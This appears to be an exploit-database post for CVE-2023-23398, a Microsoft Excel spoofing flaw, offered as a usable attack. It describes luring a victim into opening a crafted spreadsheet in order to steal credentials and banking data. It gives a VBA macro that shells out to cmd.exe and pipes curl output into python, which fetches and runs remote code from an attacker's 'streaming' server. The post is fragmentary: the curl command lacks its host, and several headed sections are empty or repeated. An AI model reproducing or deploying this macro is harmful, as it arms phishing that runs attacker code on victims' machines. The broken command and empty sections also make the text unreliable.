Microsoft Excel Spoofing

Related Vulnerabilities: CVE-2023-23398  
Publish Date: 06 Apr 2023
Author: nu11secur1ty
                ## Title: Microsoft Excel Spoofing Vulnerability
## Author: nu11secur1ty
## Date: 04.06.2023
## Vendor:
## Software:
## Reference:
## CVE-2023-23398

## Description:
The attack itself is carried out locally by a user with authentication
to the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open
a specially crafted file from a website which could lead to a local
attack on the victim's computer. The attacker can trick the victim to
open a malicious web page by using an Excel malicious file and he can
steal credentials, bank accounts information, sniffing and tracking
all the traffic of the victim without stopping - it depends on the
scenario and etc.

STATUS: HIGH Vulnerability


Sub Check_your_salaries()
End Sub
[+]The victim Exploit + Curl Piping:

The exploit server must be STREAMING at the moment when the victim hit
the button of the exploit!

Sub silno_chukane()
  Call Shell("cmd.exe /S /c" & "curl -s | python", vbNormalFocus)
End Sub

## Reproduce:

## Reference:


## Proof and Exploit

## Proof and Exploit

## Time spend:
